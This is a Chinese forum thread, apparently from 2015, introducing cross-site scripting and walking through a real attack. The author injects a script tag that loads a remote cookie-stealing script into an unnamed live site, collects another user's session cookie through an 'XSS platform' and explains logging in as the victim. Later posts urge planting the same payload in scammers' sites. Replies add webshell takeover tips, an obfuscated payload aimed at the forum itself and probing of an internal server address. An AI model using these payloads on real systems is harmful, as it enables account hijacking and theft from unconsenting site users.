XSS技术介绍与攻击实例
smith2015/07/17软件综合 IP:广东

XSS是跨站脚本攻击的别称(英文为Cross Site Scripting,但通常写成XSS以便于和另一项网页技术级联样式表CSS区分开),那么XSS技术可以用来干什么呢?



可以拿来盗号!!!!


就在几年前相信大家都有着这样的经历或者听说过这样的案例,点开某人的QQ空间后,自己的QQ账号就莫名其妙地去发一些H广告甚至被盗了,而就在去年,百度贴吧也是几乎一瞬间多了一堆奇怪的帖子,只要点进去后,自己的账号也开始自动开始狂发这种帖子,如果是吧务点进去后,大吧主会开掉小吧主,小吧主们互相封禁。。。。前者就是XSS攻击的实例,后者更为恶劣并且更加高级,这已经一种自动化并且能传播形式的攻击了,这就是XSS蠕虫。


盗号的受害者也并不一定是用户,因为网站的管理员也是一个超级用户,如果管理员被盗号,那么损失的是整个网站


现代的网页是由HTML语言和JavaScript脚本构成的,JavaScript可以嵌入到HTML文件里面,比如<script>alert("hello")</script>这样的语句,如果写到HTML文件里面,浏览器遇到<script></script>这样的标签就会执行里面的内容,这段代码是弹出一个窗口显示“hello”。


而网站或者论坛上面通常会有一些留言板块,这些板块的原理是把你写的内容提交到网站的数据库里面,然后第二个人浏览的时候,把数据库里面的信息查询出来返回给第二个用户浏览器,这个用户的浏览器在把这些内容渲染出来。
像下面的这个板块:
xss1.png



那么如果发帖的用户是黑阔,发的是一段JavaScript代码,如下面这样,第二个用户浏览了会怎么样呢?
xss2.png



结果是弹出一个框来
xss3.png
为什么会弹出框呢,可以关掉这个框用选中发帖内容右键-查看源代码看看黑阔发的贴变成了什么代码 xss4.jpg

看见没有,原来发的代码<script>alert()</script>变成了网页内容的一部分了,浏览器把它当做JavaScript命令执行了,自然会弹出一个框来。
但是我的这篇文章发了出来,里面有那么多<script>alert()</script>,为什么科创又不会弹出窗口呢?


原因是科创使用的phpwind系统在发帖的时候做了过滤,把尖括号给转义了,变成了<script>alert()</script>这样的代码,这样你的浏览器就把这些<script>alert()</script>当做普通文字处理了。这样你也就安全了。


如果只是弹一个框,感觉似乎没有什么用,可是我们把XSS语句改成这样的语句呢


<script src=XXXXXXXXXXX/RLfh4wn></script>


从代码上看,这段语句调用 了一个不知名的网站上面的链接(XXXX是一个生成的短链接,可以用新浪生成),这个链接实际上是一个JavsScript脚本,它会干很多事情,其中就包括获取你的cookie,然后发送到另一个网站上面去。
这段脚本在后台悄悄地执行,不会弹框,你不会发现任何痕迹。


黑阔获取了你的cookie之后,就可以利用你的cookie伪造登陆,然后动用你的账号做任何事情了

[修改于 3年4个月前 - 2021/07/20 16:53:41]

来自:计算机科学 / 软件综合
40
 
1
已屏蔽 原因:{{ notice.reason }}已屏蔽
{{notice.noticeContent}}
~~空空如也
smith 作者
9年5个月前 IP:广东
779661
说了这么多,实践在哪里呢,下面随便找个网站开干,但首先你需要一个xss平台,这一类的平台很多,因为都是用开源的程序开发的,可以在百度 xss 平台,当然你也可以用开源的代码自己搭建一个,不过需要提供域名和服务器,前者往往需要实名备案,这样很容易找到你。
下面是我使用的xss平台


xss5.jpg


在“我的项目”那里创建一个项目,如getcookie2,点击下一步,选择模块,我只需要cookie所以选择默认模块就行了
xss6.jpg
配置好后,点击浏览代码,上面会介绍你怎么插入xss语句:
xss7.jpg



复制这些语句,如下面的两条,然后再去找可以XSS的网站
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年5个月前 IP:广东
779663
如下面这个网站,存在XSS漏洞,为了避免大家玩坏这个网站,我不暴露这个网站的站名
我们在回复中加入XSS语句

xss8.jpg
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年5个月前 IP:广东
779664
点击回复,我们的语句被插入进去了,可以看见并没有任何的script标签回显,xss语句被隐藏了

xss9.jpg
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年5个月前 IP:广东
779666
我们再看看代码变成什么了,<script></script>标签已经被解析了

xss10.jpg
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年5个月前 IP:广东
779668
接下来你要做的事情,就是等,明天定时登陆xss平台看看,因为一旦有人浏览了这个网页,包括你自己,就会把他的cookie发过来,为了验证方便我用另一台电脑访问了一下这个页面,没过多久后,xss平台有反应了,刷新一个,新增加了一条记录:
xss11.jpg


于是我们就把另一个用户的cookie拿到手了,接下来该怎样呢,当然是打开浏览器,修改cookie登陆上去
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年5个月前 IP:广东
779673
修改cookie的方法很多,firefox和Chrome的很多插件都可以用来修改cookie,在Chrome中可以用控制台来替换修改,如下图,按F12用XXXXXXXXXXXokie命令修改cookie
xss12.jpg
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年5个月前 IP:广东
779674
修改cookie之后,按下F5刷新页面,这样你就成功欺骗服务器变成了受害的用户了,然后,你可以使用这个账号做任何事情,如果中招的是管理员,那么你就有完全控制这个网站的权利了
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年5个月前 IP:广东
779675
最后,强调一下,XSS威力强大,但不要拿去做违法的行为,我国对计算机安全的管理严格。

这个网站的XSS漏洞会报告给乌云,补天等白帽子社区,珍惜一个安全的网络环境,谢谢
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
acmilan
9年5个月前 IP:四川
779698
楼主讲的不错,很清楚,很容易看懂
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
slngen
9年5个月前 IP:四川
779703
讲的通俗易懂,,即使没有基础的同学恐怕也看得懂吧。。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
wenjizu
9年5个月前 IP:广东
779704
我发现你好像啥都懂,啥都搞,好厉害的的样子,佩服
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年5个月前 IP:广东
779708
引用 wenjizu:
我发现你好像啥都懂,啥都搞,好厉害的的样子,佩服
见笑了,这些算是小技吧,人非生而知之,不断学习
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
celeron533
9年5个月前 IP:上海
779741
引用 smith:
如下面这个网站,存在XSS漏洞,为了避免大家玩坏这个网站,我不暴露这个网站的站名
我们在回复中加入XSS语句
卧槽,是“多说”留言插件,很多网站都用了
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年5个月前 IP:广东
779747
引用 celeron533:
卧槽,是“多说”留言插件,很多网站都用了
没在意这个网站插件的版本,估计也是比较旧的版本吧,如果最新的也有那就给人玩烂了。

不过出xss也不是什么怪事,像黑客基地这样的网站,一些提交的地方都给人插过,总体来说防护这方面的防护还是有很多松懈
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
熊猫阿Bo
9年5个月前 IP:德国
779785
弹个框不能算跨站
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
仓生木品
9年5个月前 IP:湖南
779950
我拿自己的网站试了一下,真的能插。好危险。。。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年5个月前 IP:广东
780016
顺便说一下下次大家遇到钓鱼诈骗的网站,就在地址等信息的地方填XSS语句,填
<script src="XXXXXXXXXXX/RLfh4wn"></script>
这样的,不要填Alert,不要输入自己的真实信息

xxxxx.png

然后骗子看到信息之后就把cookie发过来,接着登陆他的网站,玩坏他
引用
评论(1)
2
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
cccyl
9年5个月前 IP:广东
780018
引用 smith:
顺便说一下下次大家遇到钓鱼诈骗的网站,就在地址等信息的地方填XSS语句,填
<script src="XXXXXXXXXXX/RLfh4wn"></script>
这样的,不要填Alert,不要输入自己的真实信息



然后骗子...
看了一下XXXXXXXXXXX/RLfh4wn   没看懂
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
正丰开来
9年5个月前 IP:广东
780030
我也是业余,看不懂
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
crike
9年5个月前 IP:广东
780126
飘过  看不懂
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
dome
9年5个月前 IP:江西
780342
真心觉得楼主厉害。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
bunny9915
9年5个月前 IP:江苏
780796
引用 smith:
如下面这个网站,存在XSS漏洞,为了避免大家玩坏这个网站,我不暴露这个网站的站名
我们在回复中加入XSS语句
感觉好熟悉,似乎是某某医保网站
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
哈哈哥
9年5个月前 IP:山东
780882
楼主能给弄个乌云的账号吗?
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
狼族的崛起
9年5个月前 IP:吉林
780927
额 这有点和谐= =
。。。。。。我是谁不重要 和谐社会最重要[s:;P]
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
bye258
9年5个月前 IP:内蒙古
781001
楼主真是无一不通啊
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith作者
9年5个月前 IP:广东
781002
引用 哈哈哥:
楼主能给弄个乌云的账号吗?
做路人甲就行了,乌云是个不错的平台——我也是路人甲,有时候没必要去争那个名,做个灰帽子娱乐娱乐就行了
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
314152
9年5个月前 IP:广东
781779
要是往别人的账号私信里插呢?
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
kc2038
9年5个月前 IP:江西
783299
不明觉厉啊[s::lol]
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
那抹余辉
9年3个月前 IP:天津
790884
C语言起步中。。。。。。。。。。。。。。。。。。。。。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
yangaa17
8年11个月前 IP:浙江
805160
不懂啊,小白一个
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
qazwqsx
8年11个月前 IP:美国
805217
嗯,看起来很实用
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
红盟大使
8年11个月前 IP:广东
805222
拿站常用方法之一,不只可以拿来盗号呢,表示在这里看到这个真的很暖心。。。
从我的名字也可以看出我原本是混哪的铪铪。。。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
红盟大使
8年11个月前 IP:广东
805223
一般来说玩XSS攻击的时候都是用留言框插入COOKIE劫持语句然后发给管理员,把它指向到自己空间,然后用菜刀拿站的呢。。。
楼主的方法真是有趣
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
守夜人
8年11个月前 IP:贵州
806578
XSS  CSRF攻击方法在国外都好多年了,在国内熟练起来也就几年前,特别是这几年越发多的相关攻击实例。读者们可以去各种SRC去瞅瞅看的涨点恣势Orz楼主搞得不错
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
布布卡
8年11个月前 IP:山东
806634
qq经常有 每次都是大批好友中招
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
至高之罪
4年2个月前 IP:上海
886668

有点强,希望楼主多做科普!谢谢!


引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
chenruixi
3个月10天前 IP:广东
935823

<sCRiPt/SrC=//XXXXX/w1t

引用
评论(4)
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
章鱼wheat
3个月10天前 修改于 3个月10天前 IP:江西
935844

让我试试看 未知

2334


提交了外链图片 但是评论区看不到 点击编辑评论才可以看见

image.png

前台评论是根据提交的data id来生成的 

<img data-global-click="viewImage" data-global-long-press="downloadFile" data-global-data="{"name":"XXXXXXXXXXXXXXXXg","url":"XXXXXXXXXXXXXXXXXXXXXXXX:81/r/357775?c=resource&t=lg","height":838,"width":1536}" data-src="XXXXXXXXXXXXXXXXXXXXXXXX:81/r/357775?c=resource" alt="XXXXXXXXXXXXXXXXg" data-type="view" dataimg="content" class="lazyload">



应该是科创的一个有关图片储存 的服务器ip,和 XXXXXXXXXXXX 解析的ip 182.150.31.225相邻  可以ping通 但是好像没有开放端口算是一个内网机

image.png

引用
评论(1)
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论

想参与大家的讨论?现在就 登录 或者 注册

所属专业
所属分类
上级专业
同级专业
smith
学者 机友 笔友
文章
188
回复
2347
学术分
4
2015/01/11注册,19分58秒前活动

收音机爱好者

主体类型:个人
所属领域:无
认证方式:手机号
IP归属地:广东
文件下载
加载中...
{{errorInfo}}
{{downloadWarning}}
你在 {{downloadTime}} 下载过当前文件。
文件名称:{{resource.defaultFile.name}}
下载次数:{{resource.hits}}
上传用户:{{uploader.username}}
所需积分:{{costScores}},{{holdScores}}下载当前附件免费{{description}}
积分不足,去充值
文件已丢失

当前账号的附件下载数量限制如下:
时段 个数
{{f.startingTime}}点 - {{f.endTime}}点 {{f.fileCount}}
视频暂不能访问,请登录试试
仅供内部学术交流或培训使用,请先保存到本地。本内容不代表科创观点,未经原作者同意,请勿转载。
音频暂不能访问,请登录试试
支持的图片格式:jpg, jpeg, png
插入公式
评论控制
加载中...
文号:{{pid}}
投诉或举报
加载中...
{{tip}}
请选择违规类型:
{{reason.type}}

空空如也

加载中...
详情
详情
推送到专栏从专栏移除
设为匿名取消匿名
查看作者
回复
只看作者
加入收藏取消收藏
收藏
取消收藏
折叠回复
置顶取消置顶
评学术分
鼓励
设为精选取消精选
管理提醒
编辑
通过审核
评论控制
退修或删除
历史版本
违规记录
投诉或举报
加入黑名单移除黑名单
查看IP
{{format('YYYY/MM/DD HH:mm:ss', toc)}}